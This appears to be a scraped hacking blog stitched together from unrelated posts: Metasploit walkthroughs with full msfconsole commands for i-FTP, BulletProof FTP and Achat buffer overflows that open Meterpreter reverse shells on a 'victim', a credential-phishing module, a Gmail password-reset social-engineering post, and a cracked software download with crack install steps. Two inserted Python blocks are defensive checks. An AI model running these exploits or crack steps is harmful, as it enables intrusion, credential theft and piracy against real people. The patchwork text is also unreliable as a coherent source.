Friday 6 March 2015


Hack Remote Windows PC using i-FTP Schedule Buffer Overflow

 

This module exploits a stack-based buffer overflow vulnerability in i-Ftp v2.20, caused by a long time value set for a scheduled download. By persuading the victim to place a specially-crafted Schedule.xml file in the i-FTP folder, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3.

Exploit Targets

i-Ftp v2.20

Requirement

Attacker: Kali Linux
Victim PC: Windows XP SP3
Open a Kali terminal and type msfconsole
Now type use exploit/windows/fileformat/iftp_schedule_bof
msf exploit (iftp_schedule_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (iftp_schedule_bof)>set lhost 192.168.0.107 (IP of Local Host)
msf exploit (iftp_schedule_bof)>exploit

After the malicious XML file is generated successfully, it will be stored on your local computer at:
/root/.msf4/local/schedule.xml

Copy Schedule.xml to C:\Program Files\Memecode\i.Ftp
Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
exploit
Now send your schedule.xml file to the victim. As soon as they download and open it, you can access a meterpreter shell on the victim computer.
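
A defender-side check for the file-format issue described above, as an added example that is not part of the original post and is not i-FTP or Metasploit code: it flags Schedule.xml values far longer than a time string should be, and treats files that do not parse as XML as suspect. The 64-character limit and the element and attribute names in the sample data are assumptions; the real Schedule.xml schema is not shown on this page.

```python
import re
import xml.etree.ElementTree as ET

MAX_VALUE_LEN = 64  # assumed ceiling; a scheduled-download time is a short string

# Constructed sample inputs (tag and attribute names are illustrative only).
BENIGN = b'<Schedule><Event Time="2015-03-06 10:30:00" Url="ftp://example.test/f.zip"/></Schedule>'
LONG_VALUE = b'<Schedule><Event Time="' + b"A" * 600 + b'" Url="ftp://example.test/f.zip"/></Schedule>'
NOT_XML = b'<Schedule><Event Time="' + b"\x90" * 600 + b'"/></Schedule>'


def scan_schedule(data, limit=MAX_VALUE_LEN):
    """Return (tag, field, length) for every value longer than `limit` bytes.

    Files built to overflow a buffer often contain bytes that are not valid
    XML, so a parse failure is not ignored: the raw bytes are scanned for
    long quoted runs instead.
    """
    try:
        # Standard-library parser; for bulk scanning of hostile files a
        # hardened parser (for example defusedxml) is the safer choice.
        root = ET.fromstring(data)
    except ET.ParseError:
        return [("<unparseable>", "quoted-run", len(m.group(1)))
                for m in re.finditer(rb'"([^"]*)"', data)
                if len(m.group(1)) > limit]
    findings = []
    for elem in root.iter():
        for name, value in elem.attrib.items():
            if len(value) > limit:
                findings.append((elem.tag, "@" + name, len(value)))
        text = (elem.text or "").strip()
        if len(text) > limit:
            findings.append((elem.tag, "#text", len(text)))
    return findings


def scan_file(path, limit=MAX_VALUE_LEN):
    """Scan a Schedule.xml on disk before it is placed in the i-FTP folder."""
    with open(path, "rb") as fh:
        return scan_schedule(fh.read(), limit)


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("long", LONG_VALUE), ("not-xml", NOT_XML)):
        print(label, scan_schedule(blob))
```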

Hack Remote Windows PC using BulletProof FTP Client BPS Buffer Overflow

This module exploits a stack-based buffer overflow vulnerability in BulletProof FTP Client 2010, caused by an overly long hostname. By persuading the victim to open a specially-crafted .BPS file, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3.

Exploit Targets

BulletProof FTP Client 2010

Requirement

Attacker: Kali Linux
Victim PC: Windows XP SP3
Open a Kali terminal and type msfconsole
Now type use exploit/windows/fileformat/bpftp_client_bps_bof
msf exploit (bpftp_client_bps_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (bpftp_client_bps_bof)>set lhost 192.168.0.107 (IP of Local Host)
msf exploit (bpftp_client_bps_bof)>exploit

After the malicious BPS file is generated successfully, it will be stored on your local computer at:
/root/.msf4/local/msf.bps
Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
exploit
Now send your msf.bps file to the victim. As soon as they download and open it, you can access a meterpreter shell on the victim computer.

Hack Remote Windows PC using Achat Unicode SEH Buffer Overflow 

This module exploits a Unicode SEH buffer overflow in Achat. By sending a crafted message to the default port 9256/UDP, it's possible to overwrite the SEH handler. Even though the exploit is reliable, it depends on timing, since there are two threads overflowing the stack at the same time. This module has been tested on Achat v0.150 running on Windows XP SP3 and Windows 7.

Exploit Targets

Achat v0.150

Requirement

Attacker: Kali Linux
Victim PC: Windows XP SP3
Open a Kali terminal and type msfconsole
Now type use exploit/windows/misc/achat_bof
msf exploit (achat_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (achat_bof)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (achat_bof)>set rhost 192.168.1.8 (IP of Remote Host)
msf exploit (achat_bof)>exploit

How to Download from Torrents when Torrent is Blocked in Your Network

Tribler is an open source, anonymous, decentralized peer-to-peer BitTorrent client. Tribler is based on the BitTorrent protocol and uses an overlay network for content searching, which makes the program operate independently of external websites and renders it immune to limiting external action, for example, government restraint. Due to this overlay network, Tribler does not require an external website or indexing service to discover content. The user interface of Tribler is very basic and focused on ease of use instead of diversity of features. Tribler is available for Linux, Windows, and OS X.
First, download Tribler from here and install it on your PC.
Now search for the movies, software, etc. that you want to download from torrents.

Hack Remote Windows Password using Phishing Login Prompt Exploit

This module is able to perform a phishing attack on the target by popping up a login prompt. When the user fills in credentials in the login prompt, the credentials will be sent to the attacker. The module is able to monitor for new processes and pop up a login prompt when a specific process is starting. Tested on Windows 7.

Exploit Targets

Windows 7

Requirement

Attacker: Kali Linux
Victim PC: Windows 7
Open a Kali terminal and type msfconsole
Now type use post/windows/gather/phish_windows_credentials
msf exploit (phish_windows_credentials)>set payload windows/meterpreter/reverse_tcp
msf exploit (phish_windows_credentials)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (phish_windows_credentials)>set session 1
msf exploit (phish_windows_credentials)>exploit 

Wednesday 15 May 2013

Gmail SMS Verification loophole exposed by HackingLoops

Note: If any Google guy is reading this, please raise a CR (change request) to get it fixed as soon as possible.

Gmail is the world's most famous free email service and a prominent part of Google, but they always pay attention when I expose their loopholes, as I previously did for the GX cookie loophole, which let hackers own a user's Gmail account from cookies. Google's reaction was quick and they fixed that just 4 business days after I exposed it, but that was a temporary solution; they took more than a month to fix it completely. So friends, let me explain where I have found the new bug. Maybe all of you know it, because it is such a common service, but you might have missed it. So I will expose it today, so that Google will fix it as soon as possible.



Actually this is not one loophole; there are two big loopholes that I have discovered in the Gmail SMS verification and password reset method. So friends, which one do I start with: the dangerous one first or the mild one first?
OK, OK, let's save the best one for last.

1. Mobile number as an optional field
As far as I know security norms, Google should make mobile phone verification mandatory, at least at the time of creation of a new Gmail account. The benefits of that are as follows:
a. Tracing a user will be easier: Hackers use anonymous or fake Gmail accounts to receive keylogger logs and to send fake emails to users. If we have the mobile number of the Gmail account user, we can trace him back in just a matter of a few seconds.
b. The mobile number and its location should be validated using Google Maps and the IP address used for registering the email account: Hackingloops is suggesting this because, as a hacker, I always try to create a spoof account in which almost every detail is wrong. So for complete traceability, it should be validated geographically. I think it's not that tough for cool coders to code that stuff.

This loophole is just a minor one in its category, but it will prove its worth when some hacker tries to hack anything serious by using an anonymous Gmail account. If Google realizes these things earlier, then they can surely keep track of malicious users and monitor their day-to-day activity. But as I said, until I expose these things, they will not fix them. I know everything is not perfect, but as an Internet giant, you guys should be perfect.

2. Forgot Password SMS verification code message
This is an extremely dangerous loophole and can be greatly exploited using social engineering techniques. Two to three days back, I was talking with one of my clients, who was explaining to me that his Gmail account had been hacked. He told me that he is aware of all the techniques, like keystroke logging or phishing, that hackers use to hack email accounts. Below is the conversation between the Hackingloops client (Rahul Das, works in a software firm) and me (Lokesh Singh):

Client: My Gmail account has been hacked.
Me (Lokesh): Have you got any email?

Client: Yes, I get a lot of emails daily.
Me: I mean any suspicious or unsolicited or lottery prize email.

Client: Yes, a lot of such emails, but I never open any such email and I also haven't opened any link from my email.
Me: OK. It's nice that you are aware of this stuff. Maybe you have installed some new application or software on your PC or got your hands on some hack tool.

Client: No, I haven't installed anything in the last few weeks.
Me: OK. Then for sure you might have signed up for some new website.

Client: Yes, I signed up on one website yesterday, and only after that was I unable to log in to my account. But I haven't used the same password there that I use for my Gmail.
Me: OK, tell me how you got to this site. I mean, did you find it through Google or did somebody refer it to you?

Client: Yeah, one person with an email ID something like earnunlimitedmoney@gmail.com told me about that site. But today that site is also down.
Me: What was the website's name?

Client: Something like make money by displaying ads on your website.
Me: OK. Do you know the guy with the email earnmoneyunlimited@gmail.com? I mean, is he a friend of yours?

Client: No, I just got his Gtalk invitation a day back. But I have talked with him personally and he was saying "You will get 50% of my Google Adsense revenue every article you write on my website"
Me: OK, can you tell me whether he asked for anything special, like some registration or mobile verification code or anything similar?

Client: Yes, he told me that you will get a verification code from Google on your mobile, that you need to provide to me so that I can attach you to my Google Adsense account.
Me: Can you forward me that message?

Now friends, what was my reaction after seeing that message..  __|__ fk... what the hell... The message said "Your Google Verification code is 516826".  Now, have any of you guessed when we get this message?
OK...OK... I'll give you time to guess... did you all get it... no... OK.. I will tell you..

It's the Google verification code which you get when you select the FORGOT PASSWORD option and then enter your mobile number to get the password reset code...
This is really a dangerous loophole... isn't it... anybody can be fooled using this trick...

If any Gmail or Google employee or staff member is reading it, please ask your boss to raise a change request for this.

OK..OK.. let me make the situation even worse... The hacker had reset my client's password, but he was smarter than I thought... What he did was change all the recovery options, even the mobile number. Now my client had no chance to get his credentials back. But it was my client's luck that he told me about the scenario; he got his account back and the hacker apologized for his activities.. :P I hacked the hacker's system (PC) using his IP address, which I got through readnotify. I will explain that procedure later someday, because it's unethical to hack someone...

Let's concentrate on the loophole. Now consider my point:
Don't you think the password reset message should contain the text "password reset code is blah blah..."? I had never thought such a scenario could happen and that anybody could exploit this loophole to that extent. Google guys, correct these bugs; this doesn't cost you much, but an email account costs a lot for the user who has blind faith in you guys.

Some suggestions by HackingLoops:
1. For Gmail Password Reset:
The message can be something like
"Dear Gmail User(Name),
Your Gmail Password reset verification code is 123456"
or
"Dear user,
You have requested a password reset for your Google account (email). Your verification code is 123456".

I think both of them are less than 160 chars and can be easily sent to the user and :P can be easily configured in the Google SMS module.

2. If Google doesn't want to change much of their functionality, then you can use something like:
"Dear user(name),
You have requested a Password Reset verification code for account(email). Your code is 123456".

I think, friends, you have all recognized what the loopholes are, and surely some Google guy must read this, so just wait and see how soon Google fixes these loopholes..
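
The suggestion above, worked through as an added example that is not part of the original post and is not Google's code: it builds the purpose-bound reset message using the post's second wording and checks that it really fits one 160-character SMS segment under the GSM 7-bit alphabet, which the post only estimates. The masking fallback for very long addresses, the six-digit code rule and the address user@example.com are assumptions.

```python
# GSM 03.38 default alphabet: one septet per character.
GSM7_BASIC = set(
    "@£$¥èéùìòÇ\nØø\rÅåΔ_ΦΓΛΩΠΨΣΘΞÆæßÉ !\"#¤%&'()*+,-./0123456789:;<=>?"
    "¡ABCDEFGHIJKLMNOPQRSTUVWXYZÄÖÑÜ§¿abcdefghijklmnopqrstuvwxyzäöñüà"
)
GSM7_EXT = set("^{}\\[~]|€")  # escape-prefixed characters: two septets each
SINGLE_SMS_SEPTETS = 160

# The message quoted in the post: it names neither the purpose nor the account.
WEAK_SMS = "Your Google Verification code is 516826"
# Wording taken from the post's suggestion.
TEMPLATE = ("You have requested a password reset for your Google account "
            "({account}). Your verification code is {code}.")


def septets(text):
    """Length of text in GSM-7 septets; ValueError if it would need UCS-2."""
    total = 0
    for ch in text:
        if ch in GSM7_BASIC:
            total += 1
        elif ch in GSM7_EXT:
            total += 2
        else:
            raise ValueError(f"{ch!r} is outside GSM-7 (would force UCS-2)")
    return total


def mask_account(email, keep=2):
    """Shorten the local part (assumed fallback for very long addresses)."""
    local, _, domain = email.partition("@")
    return f"{local[:keep]}***@{domain}"


def build_reset_sms(email, code):
    """Return a purpose-bound reset SMS that fits one 160-septet segment."""
    if not (code.isascii() and code.isdigit() and len(code) == 6):
        raise ValueError("code must be six ASCII digits")
    for account in (email, mask_account(email)):
        msg = TEMPLATE.format(account=account, code=code)
        if septets(msg) <= SINGLE_SMS_SEPTETS:
            return msg
    raise ValueError("does not fit one segment even with a masked account")


if __name__ == "__main__":
    sms = build_reset_sms("user@example.com", "123456")
    print(septets(sms), sms)
```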





Desktop Lock 7.3.1 Final Business Edition Full Version | 1.4 MB


Posted by Jett Catallorca at 21:56

Desktop Lock is a computer security protection and access control software product. You can use it to lock a computer to prevent people from accessing your private documents and resources. When the computer is locked by Desktop Lock, no one can access your documents, browse your computer, or use programs on your computer.

You can lock your computer with one click, or let Desktop Lock automatically lock your system at any time or when the system becomes idle. You can customize the appearance of the locked desktop with the options provided by Desktop Lock. Desktop Lock also supports a hotkey to lock the system.

Use Desktop Lock to:
  • Lock your system to prevent anyone from accessing your private data or using your computer at any time.
  • Automatically detect the state of your computer, then automatically lock your system if it detected that you have not used the computer (the system becomes idle) for a period of time.
  • Lock the system and play any audio or video file on the screen, so that people can view the media on your computer but cannot control your computer.
  • Lock the system and run a program on the desktop, so that anyone can only use that one program on your computer and cannot close it.
  • This security software can also be used on any computer where you want to show Flash or PowerPoint files to others but don't want them to access your computer.
  • With the new Virtual Screen tool, Desktop Lock can also create virtual desktops and show only specific programs to users, so that users can only use those specific programs on your computer.


Here are some key features of "Desktop Lock":
  • During locking, no one can force it to be terminated by using the "Task Manager" or the "Ctrl+Alt+Del" key combination.
  • Supports locking the system automatically when the system becomes idle
  • Supports automatically locking the system at a specific time
  • Supports automatically locking the system after the computer has booted
  • Supports staying locked if anyone forces the locked computer to restart by pressing the Power button on the computer tower or unplugging the power supply
  • Provides more features to allow you to customize your own locked desktop
  • Supports a hotkey to lock the system directly
  • Allows visitors to leave messages during locking
  • Supports showing the banner during locking with any lock mode
  • A powerful "Virtual Screen" tool allows you to create a virtual desktop
  • Plays a media file during locking; the media file can be any video or audio file that is supported by Microsoft Media Player
  • Supports specifying a program to be automatically run during locking
  • Desktop Lock can disable the screensaver during locking; Desktop Lock will also prevent users from shutting down Windows during locking
  • Supports schedule feature
  • Supports multiple monitors
  • Supports multiple users

OS : Windows XP, 2003, Vista, 7, 8

Language : English

Install Notes:
1] Install The App
2] Do Not Launch The App
3] Copy Content from Crack Folder to Install Directory
4] Enjoy This Release!!